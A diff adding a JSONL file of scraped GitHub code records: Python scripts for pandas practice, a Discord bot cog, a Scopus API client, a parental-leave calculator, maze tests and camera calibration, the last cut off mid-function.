diff --git "a/4810.jsonl" "b/4810.jsonl" new file mode 100644--- /dev/null +++ "b/4810.jsonl" @@ -0,0 +1,397 @@ +{"seq_id":"29836091622","text":"#import pandas as dtf\ndtf = \"\"\n#↑jupyterでは上のコメントを外し、pdの変数宣言を消す\nleft = dtf.DataFrame({'name':['aaa','bbb','ccc','ddd'],'age':[24,33,27,42]})\nright = dtf.DataFrame({'name':['eee','bbb','aaa','fff','ddd'],'group':['x','y','y','x','x']}) #表作成\n\nleft\n\ndtf.merge(left,right) #表結合\ndtf.merge(left,right,how='outer') #どちらかの表にしか値が無い場合でも結合させる\ndtf.concat([left,right]) #単純に縦に表結合させる\ndtf.concat([left,right],axis=1) #キーに関係なく横に結合させる\n","repo_name":"zumioo/study_Python","sub_path":"pandas/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29018691973","text":"from sqlalchemy import create_engine, Column, Integer, String, Table, MetaData, Boolean\n\nfrom util.data.table_helper import TableHelper\n\n\nclass UserData:\n def __init__(self, user_id):\n self.user_id = user_id\n\n engine = create_engine(f'sqlite:///data/user_{self.user_id}.db', echo=False)\n meta = MetaData()\n self.conn = engine.connect()\n\n self.booleans = self.Booleans(meta, self.conn)\n self.playlists = self.Playlists(meta, self.conn)\n self.strings = self.Strings(meta, self.conn)\n\n meta.create_all(engine)\n\n class Booleans(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.booleans = Table(\n 'booleans', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', Boolean)\n )\n\n super().__init__(self.booleans, self.conn)\n\n def insert(self, name: str, value: bool):\n self.insert_([{'name': name, 'value': value}])\n\n class Playlists(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.playlists = Table(\n 'playlists', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', String)\n )\n\n super().__init__(self.playlists, self.conn)\n\n def insert(self, name: str, value: str):\n self.insert_([{'name': name, 'value': value}])\n\n class Strings(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.strings = Table(\n 'strings', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', String)\n )\n\n super().__init__(self.strings, self.conn)\n\n def insert(self, name: str, value: str):\n self.insert_([{'name': name, 'value': value}])\n","repo_name":"MiningMark48/Tidal-Bot","sub_path":"util/data/user_data.py","file_name":"user_data.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"13953723634","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, division\n\nclass RomanNumeralsConverter(object):\n\n\tromans_dict = {\n\t\t1000 : 'M',\n\t\t900 : 'CM',\n\t\t500 : 'D',\n\t\t400 : 'CD',\n\t\t100 : 'C',\n\t\t90 : 'XC',\n\t\t50 : 'L',\n\t\t40 : 'XL',\n\t\t10 : 'X',\n\t\t9 : 'IX',\n\t\t5 : 'V',\n\t\t4 : 'IV',\n\t\t1 : 'I',\n\t}\n\n\tdef __init__(self):\n\t\tself.result = ''\n\n\tdef convert(self, number):\n\n\t\t# sort the values descending; dict.keys() has no .sort() on Python 3\n\t\tkeys = sorted(self.romans_dict.keys(), reverse=True)\n\n\t\tfor key in keys:\n\t\t\twhile number >= key:\n\t\t\t\tself.result += self.romans_dict[key]\n\t\t\t\tnumber -= key\n\n\t\treturn self.result","repo_name":"scrubmx/CodeKatas","sub_path":"python/roman_numerals/src/roman_numerals.py","file_name":"roman_numerals.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"22702141687","text":"import argparse\nfrom sklearn import metrics\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument('file', help='specify the path of the results file')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n    label_true = []\n    label_pred = []\n    target_names = []\n    with Path(args.file).open() as f:\n        for line in f:\n            tag_name = line.strip().split()[0]\n            if tag_name not in target_names:\n                target_names.append(tag_name)\n            label_true.append(tag_name)\n            label_pred.append(line.strip().split()[1])\n    print(metrics.classification_report(y_pred=label_pred, y_true=label_true, target_names=['POS', 'NEG']))\n","repo_name":"linguishi/chinese_sentiment","sub_path":"model/score_report.py","file_name":"score_report.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":655,"dataset":"github-code","pt":"86"}
+{"seq_id":"14875153592","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\nimport settings\nimport datetime\nfrom modules.modImakita import makeReply\n\nclass ImakitaCog(commands.Cog):\n    def __init__(self, bot: commands.Bot):\n        super().__init__()\n        self.bot = bot\n\n    @commands.Cog.listener()\n    async def on_ready(self):\n        await self.bot.tree.sync(guild=discord.Object(int(settings.getId())))\n        print(\"[Cogs] ImakitaCog is ready.\")\n\n    @app_commands.command(name=\"imakita\", description=\"Summarizes the conversation from the specified number of hours\")\n    @app_commands.guilds(int(settings.getId()))\n\n    async def imakita(self, interaction: discord.Interaction, hour: int):\n        await interaction.response.defer()\n\n        end_time = datetime.datetime.now()\n        start_time = end_time - datetime.timedelta(hours=hour)\n\n        text = []\n        async for message in interaction.channel.history(limit=None, after=start_time, before=end_time):\n            text.append(f\"{message.author}: {message.content}\")\n\n        await interaction.followup.send(embed=makeReply(text,hour))\n    \n\nasync def setup(bot: commands.Bot):\n    await bot.add_cog(ImakitaCog(bot))","repo_name":"Soli0222/Charmy","sub_path":"cogs/imakita.py","file_name":"imakita.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"9762536846","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\nbas_sek = 1166\nlaginkomst_sek = 180\nlaginkomst_dagar = 90\nhoginkomst_dagar = 390\ntotalt_antal_dagar = 480\nveckor_manad = 4.35\npauline_antal_hoginkomstdagar = [0]\npauline_antal_hoginkomstdagar_manad_for_manad = [0]\npauline_hoginkomst_summering = [0]
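# Each running-total list starts with a single 0 so the loops below can always\n# read the previous total via [-1] before appending the next month's value.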
\npauline_antal_laginkomstdagar = [0]\npauline_laginkomst_summering = [0]\npauline_laginkomst_och_hoginkomst_summering = []\ntom_antal_hoginkomstdagar = [0]\ntom_antal_hoginkomstdagar_manad_for_manad = [0]\ntom_hoginkomst_summering = [0]\ntom_antal_laginkomstdagar = [0]\ntom_laginkomst_summering = [0]\ntom_laginkomst_och_hoginkomst_summering = []\n\ndef lagg_till_dagar_pauline():\n    pauline_manader_ledig = int(input(\"How many months will Pauline be on leave?\"))\n    pauline_antal_dagar_betalt_per_vecka_hoginkomst = int(input(\"How many high-income days per week should Pauline take?\"))\n    pauline_antal_dagar_betalt_per_vecka_laginkomst = int(input(\"How many low-income days per week should Pauline take?\"))\n    \n    for _ in range(pauline_manader_ledig):\n        pauline_antal_hoginkomstdagar.append(pauline_antal_dagar_betalt_per_vecka_hoginkomst)\n        pauline_antal_hoginkomstdagar_manad_for_manad.append(pauline_antal_hoginkomstdagar_manad_for_manad[-1] + pauline_antal_dagar_betalt_per_vecka_hoginkomst)\n        pauline_hoginkomst_summering.append(pauline_hoginkomst_summering[-1] + (pauline_antal_dagar_betalt_per_vecka_hoginkomst * veckor_manad * bas_sek))\n        pauline_antal_laginkomstdagar.append(pauline_antal_dagar_betalt_per_vecka_laginkomst)\n        pauline_laginkomst_summering.append(pauline_laginkomst_summering[-1] + (pauline_antal_dagar_betalt_per_vecka_laginkomst * veckor_manad * laginkomst_sek))\n    \n\ndef lagg_till_dagar_tom():\n    tom_manader_ledig = int(input(\"How many months will Tom be on leave?\"))\n    tom_antal_dagar_betalt_per_vecka_hoginkomst = int(input(\"How many high-income days per week should Tom take?\"))\n    tom_antal_dagar_betalt_per_vecka_laginkomst = int(input(\"How many low-income days per week should Tom take?\"))\n    \n    for _ in range(tom_manader_ledig):\n        tom_antal_hoginkomstdagar.append(tom_antal_dagar_betalt_per_vecka_hoginkomst)\n        tom_antal_hoginkomstdagar_manad_for_manad.append(tom_antal_hoginkomstdagar_manad_for_manad[-1] + tom_antal_dagar_betalt_per_vecka_hoginkomst)\n        tom_hoginkomst_summering.append(tom_hoginkomst_summering[-1] + (tom_antal_dagar_betalt_per_vecka_hoginkomst * veckor_manad * bas_sek))\n        tom_antal_laginkomstdagar.append(tom_antal_dagar_betalt_per_vecka_laginkomst)\n        tom_laginkomst_summering.append(tom_laginkomst_summering[-1] + (tom_antal_dagar_betalt_per_vecka_laginkomst * veckor_manad * laginkomst_sek))\n\n\ndef skapa_listor():\n    lagg_till_dagar_pauline()\n    while True:\n        fler_dagar_pauline = str(input(\"Do you want to add more days? (y/n)\"))\n        if fler_dagar_pauline in ('n', 'N', 'no', 'No', 'nej'):\n            break\n        else:\n            lagg_till_dagar_pauline()
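    # Tom's section below mirrors Pauline's: prompt for months and weekly days,\n    # then accumulate his monthly totals. The y/n answers are checked with tuple\n    # membership because a chained ('n' or 'No' or ...) expression always\n    # evaluates to just 'n'.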
(y/n)\"))\n if fler_dagar_tom == ('n' or 'No' or 'no' or 'N' or 'nej'):\n break\n else:\n lagg_till_dagar_tom()\n \n pauline_laginkomst_och_hoginkomst_summering = np.add(pauline_hoginkomst_summering, pauline_laginkomst_summering)\n tom_laginkomst_och_hoginkomst_summering = np.add(tom_hoginkomst_summering, tom_laginkomst_summering)\n\n #print('1', pauline_antal_hoginkomstdagar)\n #print('2', pauline_antal_hoginkomstdagar_manad_for_manad)\n #print('3', pauline_hoginkomst_summering)\n #print('4', pauline_antal_laginkomstdagar)\n #print('5', pauline_laginkomst_summering)\n #print('6', pauline_laginkomst_och_hoginkomst_summering)\n #print('7', tom_antal_hoginkomstdagar)\n #print('8', tom_hoginkomst_summering)\n #print('9', tom_antal_laginkomstdagar)\n #print('10', tom_laginkomst_summering)\n #print('11', tom_laginkomst_och_hoginkomst_summering)\n\n manader_pauline = []\n for i in range(len(pauline_laginkomst_och_hoginkomst_summering)):\n manader_pauline.append(i)\n \n manader_tom = []\n for i in range(len(tom_laginkomst_och_hoginkomst_summering)):\n manader_tom.append(i)\n \n \n plt.plot(manader_pauline, pauline_laginkomst_och_hoginkomst_summering, label='Pauline')\n plt.plot(manader_tom, tom_laginkomst_och_hoginkomst_summering, label='Tom')\n plt.legend()\n plt.show()\n\n pauline_antal_hoginkomstdagar_totalt = sum(pauline_antal_hoginkomstdagar) * 4.35\n pauline_antal_laginkomstdagar_totalt = sum(pauline_antal_laginkomstdagar) * 4.35\n tom_antal_hoginkomstdagar_totalt = sum(tom_antal_hoginkomstdagar) * 4.35\n tom_antal_laginkomstdagar_totalt = sum(tom_antal_laginkomstdagar) * 4.35\n hoginkomst_dagar_kvar = hoginkomst_dagar - pauline_antal_hoginkomstdagar_totalt - tom_antal_hoginkomstdagar_totalt\n laginkomst_dagar_kvar = laginkomst_dagar - pauline_antal_laginkomstdagar_totalt - tom_antal_laginkomstdagar_totalt\n\n plt.bar('hoginkomstdagar Pauline', pauline_antal_hoginkomstdagar_totalt)\n plt.bar('laginkomstdagar Pauline', pauline_antal_laginkomstdagar_totalt)\n\n plt.bar('hoginkomstdagar Tom', tom_antal_hoginkomstdagar_totalt)\n plt.bar('laginkomstdagar Tom', tom_antal_laginkomstdagar_totalt)\n\n plt.bar('laginkomst dagar kvar', laginkomst_dagar_kvar)\n plt.bar('hoginkomst dagar kvar', hoginkomst_dagar_kvar)\n plt.show()\n\nwhile True:\n skapa_listor()\n quit()\n","repo_name":"TamiAlQuida/TamiAlQuida.github.io","sub_path":"scripts/foraldradagar.py","file_name":"foraldradagar.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37778472643","text":"# import the inputs logic\nfrom inputs import gather_imputs, input_dict\n\n# import the calculation logic\nfrom calculator import calculateMonthlyOwnershipCosts, getRecommendation\n\n# import the outputs logic\nfrom outputs import listsGenerator\n\n# Libraries import\nimport termtables as tt\n\ndef main():\n print(\"Welcome to the Car Affordability Calculator! 
\\n\" + \"Please kindly enter the following requested information: \")\n while True:\n # Get the inputs from the user\n user_inputs = gather_imputs(input_dict)\n print(\"\\n Thank you \" + user_inputs[\"user_details\"][\"name\"]+ \".\\n\")\n #Calculate based on the inputs and the number of cars to evaluate\n # Initialize the URL for fetching fuel prices\n fuel_price_url = \"https://gasprices.aaa.com/\"\n # Calculate based on the inputs and the number of cars to evaluate\n for i, vehicle in enumerate(user_inputs['vehicle_details']):\n # Extracting details for each vehicle\n v_details = user_inputs['vehicle_details'][i]\n # Calculating the monthly ownership costs for each vehicle\n all_ownership_costs = calculateMonthlyOwnershipCosts(\n yearly_maintenance_cost=v_details['Estimated yearly maintenance cost'],\n yearly_insurance_cost=v_details['Estimated yearly insurance cost'],\n yearly_registration_cost=v_details['Estimated yearly registration cost'],\n yearly_repair_cost=v_details['Estimated yearly repair cost'],\n fuel_type=v_details['fuel type'],\n MPG=v_details['MPG (miles per gallon)'],\n avg_dist_per_weekday=v_details['Average distance driven per weekday'],\n avg_dist_per_weekend=v_details['Average distance driven per weekend'],\n URL=fuel_price_url,\n loan_amount=v_details['Car loan amount'],\n down_payment=v_details['Car loan down payment'],\n annual_interest_rate=v_details['Car loan interest rate'],\n loan_term_years=v_details['Car loan time']\n )\n # Adding the monthly ownership cost to the user_inputs dictionary for each vehicle\n user_inputs['vehicle_details'][i]['monthly_ownership_cost'] = all_ownership_costs\n \n # Print the results\n vehicle_details_table = listsGenerator(user_inputs, \"vehicle_details\")\n vehicle_financial_details_table = listsGenerator(user_inputs, \"financial_details\")\n vehicle_monthly_ownership_costs_table = listsGenerator(user_inputs, \"monthly_costs\")\n \n print(\"The following are the details of the vehicles you entered: \\n\")\n tt.print(vehicle_details_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n print(\"The following are the financial details of the vehicles you entered: \\n\")\n tt.print(vehicle_financial_details_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n print(\"The following are the monthly ownership costs of the vehicles you entered: \\n\")\n tt.print(vehicle_monthly_ownership_costs_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n \n # Recommend the best car based on the monthly ownership costs\n recommendation, table = getRecommendation(user_inputs)\n print(recommendation)\n print(\"\\nDetailed Comparison:\")\n print(table)\n if input(\"Do you want to try again? 
(Y/N): \").lower() != \"y\":\n print(\"Thank you for using the Car Affordability Calculator!\")\n break\n else:\n print(\"Kindly enter the following requested information: \")\n \nmain()","repo_name":"angelo-oviedo/car-affordabillity-calculator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70604080606","text":"import unittest\nfrom maze import Maze\nfrom ds import UnionFind\n\nclass Tests(unittest.TestCase):\n def test_maze_create_cells(self):\n start_x, start_y = 0, 0\n num_rows, num_cols = 15, 10\n cell_size = 10\n window = None\n maze = Maze(start_x, start_y, num_rows, num_cols, cell_size, window)\n\n self.assertEqual(len(maze._cells), num_rows)\n self.assertEqual(len(maze._cells[0]), num_cols)\n\n def test_reset_cells_visited(self):\n start_x, start_y = 0, 0\n num_rows, num_cols = 15, 10\n cell_size = 10\n window = None\n maze = Maze(start_x, start_y, num_rows, num_cols, cell_size, window)\n\n for i in range(maze._row_count):\n for j in range(maze._col_count):\n maze._cells[i][j].visited = True\n\n maze._reset_cells_visited()\n\n all_unvisited = True\n for i in range(maze._row_count):\n for j in range(maze._col_count):\n if maze._cells[i][j].visited:\n all_unvisited = False\n break;\n \n self.assertEqual(all_unvisited, True)\n\n def test_union_find_created_correctly(self):\n size = 10\n uf = UnionFind(size)\n self.assertEqual(uf.size, size)\n self.assertEqual(uf.set_count, size)\n self.assertEqual(len(uf.ids), size)\n self.assertEqual(len(uf.sizes), size)\n \n def test_union_unify_works_correctly(self):\n size = 10\n uf = UnionFind(size)\n p, q, z = 0, size // 2, size - 1\n uf.unify(p, q)\n uf.unify(q, z)\n\n p_set_id, q_set_id, z_set_id = uf.find(p), uf.find(q), uf.find(z)\n p_set_size = uf.get_set_size(p)\n\n self.assertEqual(p_set_id, q_set_id)\n self.assertEqual(p_set_id, z_set_id)\n self.assertEqual(p_set_size, 3)\n \n def test_union_connection_checking_works_correctly(self):\n size = 10\n uf = UnionFind(size)\n p, q, z = 0, size // 2, size - 1\n uf.unify(p, q)\n pq_united = True\n pz_united = False\n qz_united = False\n\n self.assertEqual(uf.check_if_connected(p, q), pq_united)\n self.assertEqual(uf.check_if_connected(p, z), pz_united)\n self.assertEqual(uf.check_if_connected(q, z), qz_united)\n \n\n \n \nif __name__ == \"__main__\":\n unittest.main()\n\n\n","repo_name":"rizvanium/mazesolver","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"42957822796","text":"# -*- coding: utf-8 -*-\n\nimport requests, warnings, os, json\nimport numpy as np\nimport pandas as pd\nfrom datetime import date\nfrom pyscopus import APIURI\nfrom pyscopus.utils import _parse_author, _parse_author_retrieval,\\\n _parse_affiliation, _parse_entry, _parse_citation,\\\n _parse_abstract_retrieval, trunc,\\\n _search_scopus, _parse_serial, _parse_aff\n\nclass Scopus(object):\n '''\n Scopus class.\n For instantiation of scopus objects to retrieve data from scopus.com\n Refer to http://zhiyzuo.github.com/python-scopus for more information\n Let me know if there's any issue with this code.\n\n Happy coding,\n Zhiya\n zhiyazuo@gmail.com\n '''\n\n def __init__(self, apikey=None):\n self.apikey = apikey\n\n def add_key(self, apikey):\n self.apikey = apikey\n\n def search(self, query, count=100, type_=1, 
view='COMPLETE'):\n        '''\n        Search for documents matching the keywords in query\n        Details: http://api.elsevier.com/documentation/SCOPUSSearchAPI.wadl\n        Tips: http://api.elsevier.com/documentation/search/SCOPUSSearchTips.htm\n\n        Parameters\n        ----------------------------------------------------------------------\n        query : str\n            Query style (see above websites).\n        count : int\n            The number of records to be returned.\n        view : string\n            Returned result view (i.e., return fields). Can only be STANDARD for author search.\n\n        Returns\n        ----------------------------------------------------------------------\n        pandas.DataFrame\n            Data frame of search results.\n        '''\n\n\n        if type(count) is not int:\n            raise ValueError(\"%s is not a valid input for the number of entries to return.\" %count)\n\n        result_df, total_count = _search_scopus(self.apikey, query, type_, view=view)\n\n        if total_count <= count:\n            count = total_count\n\n        if count <= 25:\n            # if less than 25, just one page of response is enough\n            return result_df[:count]\n\n        # if larger than, go to next few pages until enough\n        i = 1\n        while True:\n            index = 25*i\n            result_df = result_df.append(_search_scopus(self.apikey, query, type_, view=view, index=index),\n                                         ignore_index=True)\n            if result_df.shape[0] >= count:\n                return result_df[:count]\n            i += 1\n\n    def search_author(self, query, view='STANDARD', count=10):\n        '''\n        Search for specific authors\n        Details: http://api.elsevier.com/documentation/AUTHORSearchAPI.wadl\n        Fields: http://api.elsevier.com/content/search/fields/author\n\n        Parameters\n        ----------------------------------------------------------------------\n        query : str\n            Query style (see above websites).\n        count : int\n            The number of records to be returned.\n        view : string\n            Returned result view (i.e., return fields). Can only be STANDARD for author search.\n\n        Returns\n        ----------------------------------------------------------------------\n        pandas.DataFrame\n            Data frame of search results.\n        '''\n\n        return self.search(query, count, type_=2, view=view)\n\n    def search_author_publication(self, author_id, count=10000):\n        '''\n        Returns a list of document records for an author in the form of pandas.DataFrame.\n\n        Search for specific authors' document records in Scopus\n        Same thing for search, with search limited to author id\n\n        Parameters\n        ----------------------------------------------------------------------\n        author_id : str\n            Author id in Scopus database.\n        count : int\n            The number of records to return. By default set to 10000 for all docs.\n\n        Returns\n        ----------------------------------------------------------------------\n        pandas.DataFrame\n            Data frame of search results.\n        '''\n\n        query = 'au-id(%s)'%author_id\n        return self.search(query, count)\n\n    def retrieve_author(self, author_id):\n        '''\n        Search for specific authors\n        Details: http://api.elsevier.com/documentation/AuthorRetrievalAPI.wadl\n\n        Parameters\n        ----------------------------------------------------------------------\n        author_id : str\n            Author id in Scopus database.\n\n        Returns\n        ----------------------------------------------------------------------\n        dict\n            Dictionary of author information.\n        '''\n\n        par = {'apikey': self.apikey, 'httpAccept': 'application/json'}\n        r = requests.get('%s/%s'%(APIURI.AUTHOR, author_id), params=par)\n\n        js = r.json()\n        try:\n            return _parse_author_retrieval(js)\n        except:\n            raise ValueError('Author %s not found!' %author_id)
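    # Usage sketch (hypothetical API key and author id, for illustration only):\n    #   scopus = Scopus('your-apikey')\n    #   author_info = scopus.retrieve_author('55555555555')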
\n\n    def retrieve_abstract(self, scopus_id, download_path=None, view='FULL'):\n        '''\n        Retrieve publication abstracts\n        Details: https://api.elsevier.com/documentation/AbstractRetrievalAPI.wadl\n\n        Parameters\n        ----------------------------------------------------------------------\n        scopus_id : str\n            Scopus id of a publication in Scopus database.\n        download_path : str\n            Where to save JSON response for this abstract retrieval result. Default is None (do not save)\n        view : str\n            Options: BASIC, META, META_ABS, REF, FULL (default)\n\n\n        Returns\n        ----------------------------------------------------------------------\n        dict\n            Dictionary of publication id, title, and abstract.\n        '''\n\n        par = {'apikey': self.apikey, 'httpAccept': 'application/json', 'view': view}\n        r = requests.get('%s/%s'%(APIURI.ABSTRACT, scopus_id), params=par)\n\n        js = r.json()\n\n        if download_path is not None:\n            if not os.path.exists(download_path):\n                os.mkdir(download_path)\n            if not download_path.endswith('/'):\n                download_path += '/'\n            json.dump(js, open(download_path+scopus_id+'.json', 'w'))\n\n        try:\n            return _parse_abstract_retrieval(js)\n        except:\n            raise ValueError('Abstract for %s not found!' %scopus_id)\n\n    def retrieve_citation(self, scopus_id_array, year_range):\n        '''\n        Retrieve citation counts\n        Details: https://api.elsevier.com/documentation/AbstractCitationAPI.wadl\n\n        Parameters\n        ----------------------------------------------------------------------\n        scopus_id_array : array (list, tuple or np.array)\n            Scopus id of a publication in Scopus database.\n\n        year_range : array (list, tuple or np.array) of length 2\n            1st element is the start year; 2nd element is the end year. Both integers.\n\n        Returns\n        ----------------------------------------------------------------------\n        pandas DataFrame\n            Data frame of citation counts over time.\n        '''\n\n        date = '%i-%i' %(year_range[0], year_range[1])\n\n        par = {'apikey': self.apikey, 'scopus_id': ','.join(scopus_id_array), \\\n               'httpAccept':'application/json', 'date': date}\n\n        r = requests.get(APIURI.CITATION, params=par)\n        js = r.json()\n\n        return _parse_citation(js, year_range)\n\n    def retrieve_full_text(self, full_text_link):\n        r = requests.get(full_text_link, params={'apikey': self.apikey,\n                                                 'httpAccept': 'application/json'}\n                         )\n        return r.json()['full-text-retrieval-response']['originalText']\n\n    def search_serial(self, title, view='CITESCORE', count=200):\n        '''\n        Search serial title metadata\n        Details: https://dev.elsevier.com/documentation/SerialTitleAPI.wadl\n\n        Parameters\n        ----------\n        title : str\n            Title to be searched in the database\n        view : str\n            Options: STANDARD, ENHANCED, CITESCORE (default), COVERIMAGE\n        count : int\n            Max number of results to be returned (200 by default)\n\n        Returns\n        -------\n        3 pandas DataFrames:\n            - first one is the meta information\n            - second one is the temporal citescore in each year\n            - last one is the temporal rank/percentile for each subject code in each year\n        If cite score is not available then the last two are empty\n        '''\n        if type(count) != int or count > 200:\n            warnings.warn(\"count corrected to be 200\", UserWarning)\n            count = 200\n        if view not in ['STANDARD', 'ENHANCED', 'CITESCORE']:\n            warnings.warn(\"view corrected to be CITESCORE\", UserWarning)\n            view = 'CITESCORE'\n        par = {'apiKey': self.apikey, 'title': title,\n               'count': count, 'view': view}\n        r = requests.get(APIURI.SERIAL_SEARCH, par)\n        return _parse_serial(r.json())
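    # Usage sketch (hypothetical journal title, for illustration only):\n    #   meta_df, citescore_df, rank_df = scopus.search_serial('Scientometrics')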
\n\n    def retrieve_serial(self, issn, view='CITESCORE'):\n        '''\n        Retrieve serial title metadata, given issn\n        Details: https://dev.elsevier.com/documentation/SerialTitleAPI.wadl\n\n        Parameters\n        ----------\n        issn : str\n            ISSN of the serial\n        view : str\n            Options: STANDARD, ENHANCED, CITESCORE (default), COVERIMAGE\n\n        Returns\n        -------\n        3 pandas DataFrames:\n            - first one is the meta information\n            - second one is the temporal citescore in each year\n            - last one is the temporal rank/percentile for each subject code in each year\n        If cite score is not available then the last two are empty\n        '''\n\n        if view not in ['STANDARD', 'ENHANCED', 'CITESCORE']:\n            warnings.warn(\"view corrected to be CITESCORE\", UserWarning)\n            view = 'CITESCORE'\n        par = {'apiKey': self.apikey, 'view': view}\n\n        r = requests.get(APIURI.SERIAL_RETRIEVAL+issn,\n                         params=par)\n        return _parse_serial(r.json())\n\n    def retrieve_affiliation(self, aff_id, view='STANDARD'):\n        '''\n        Retrieve affiliation profile, given id\n        Details: https://dev.elsevier.com/documentation/AffiliationRetrievalAPI.wadl\n\n        Parameters\n        ----------\n        aff_id : str\n            affiliation_id\n        view : str\n            Options: STANDARD (default), LIGHT, BASIC\n\n        Returns\n        -------\n        '''\n\n        par = {'apiKey': self.apikey, 'view': view, 'httpAccept': 'application/json'}\n\n        r = requests.get(APIURI.AFFL_RETRIEVAL+aff_id,\n                         params=par)\n        d = _parse_aff(r.json()['affiliation-retrieval-response'])\n        d['aff_id'] = aff_id\n        return d\n","repo_name":"zhiyzuo/python-scopus","sub_path":"pyscopus/scopus.py","file_name":"scopus.py","file_ext":"py","file_size_in_byte":11304,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"86"}
+{"seq_id":"44430586979","text":"import numpy as np\nimport cv2\nimport camera\nimport time\nimport sys\nimport glob\nimport os\nimport random\n\ncam_setting = {\"width\":1280,\"height\":720,\"frame_rate\":23,\"shutter\":0,\"iso\":800}\n# capture imgs or do calibration\n# \"shoot\" or \"calibrate\"\nstatus = sys.argv[1]\n# maximum samples numbers used for calculation\nMAX_IMAGES = int(sys.argv[2])\n# save path for left and right image pair\nL_path = '/home/pi/Desktop/PyCharm/L_cali'\nR_path = '/home/pi/Desktop/PyCharm/R_cali'\n\n\n# calibrate single camera\ndef Find_chessboard_single(img_path):\n    CHESSBOARD_SIZE = (9, 6)\n    OBJECT_POINT_ZERO = np.zeros((CHESSBOARD_SIZE[0] * CHESSBOARD_SIZE[1], 3),\n                                 np.float32)\n    OBJECT_POINT_ZERO[:, :2] = np.mgrid[0:CHESSBOARD_SIZE[0],\n                               0:CHESSBOARD_SIZE[1]].T.reshape(-1, 2)\n\n\n    TERMINATION_CRITERIA = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_MAX_ITER, 30,\n                            0.001)\n\n    filenames = []\n    objectPoints = []\n    imagePoints = []\n    imageSize = None\n    cacheFile = \"{0}/chessboards.npz\".format(img_path)\n    try:\n        cache = np.load(cacheFile)\n        print(\"Loading image data from cache file at {0}\".format(cacheFile))\n        return (list(cache[\"filenames\"]), list(cache[\"objectPoints\"]),\n                list(cache[\"imagePoints\"]), tuple(cache[\"imageSize\"]))\n    except IOError:\n        print(\"Cache file at {0} not found\".format(cacheFile))\n\n\n    print(\"Reading images at {0}\".format(img_path))\n    imagePaths = glob.glob(\"{0}/*.jpg\".format(img_path))\n\n    for imagePath in sorted(imagePaths):\n        image = cv2.imread(imagePath)\n        grayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n        newSize = grayImage.shape[::-1]\n        if imageSize != None and newSize != imageSize:\n            raise ValueError(\n                    \"Calibration image at {0} is not the same size as the others\"\n                    .format(imagePath))\n        imageSize = newSize\n\n        hasCorners, corners = cv2.findChessboardCorners(grayImage,\n                                                        CHESSBOARD_SIZE, cv2.CALIB_CB_FAST_CHECK)\n\n        if hasCorners:\n
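            # A full chessboard was found in this image: record the filename, pair\n            # the detected 2-D corners with the 3-D board template, and refine the\n            # corners to sub-pixel accuracy with cornerSubPix before storing them.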
filenames.append(os.path.basename(imagePath))\n objectPoints.append(OBJECT_POINT_ZERO)\n cv2.cornerSubPix(grayImage, corners, (11, 11), (-1, -1),\n TERMINATION_CRITERIA)\n imagePoints.append(corners)\n\n cv2.drawChessboardCorners(image, CHESSBOARD_SIZE, corners, hasCorners)\n cv2.imshow(img_path, image)\n cv2.waitKey(100)\n\n cv2.destroyWindow(img_path)\n\n print(\"Found corners in {0} out of {1} images\"\n .format(len(imagePoints), len(imagePaths)))\n\n\n np.savez_compressed(cacheFile,\n filenames=filenames, objectPoints=objectPoints,\n imagePoints=imagePoints, imageSize=imageSize)\n\n return filenames, objectPoints, imagePoints, imageSize\n\n\n# extract require obj, img points\ndef Get_require_points(requestedFilenames,allFilenames, objectPoints, imagePoints):\n\n requestedFilenameSet = set(requestedFilenames)\n requestedObjectPoints = []\n requestedImagePoints = []\n\n for index, filename in enumerate(allFilenames):\n if filename in requestedFilenameSet:\n requestedObjectPoints.append(objectPoints[index])\n requestedImagePoints.append(imagePoints[index])\n\n return requestedObjectPoints, requestedImagePoints\n\n\n# test single camera calibration\ndef Test_calibration(mtx,dist,files):\n print(\"Reading images at {0}\".format(files))\n imagePaths = glob.glob(\"{0}/*.jpg\".format(files))\n\n for filename in sorted(imagePaths):\n img = cv2.imread(filename)\n # refine camera matrix\n h, w = img.shape[:2]\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 0, (w, h))\n\n # undistort\n dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n\n # crop the image\n # x, y, w, h = roi\n # dst = dst[y:y + h, x:x + w]\n cv2.imshow(\"original\",img)\n cv2.imshow('calibresult', dst)\n\n 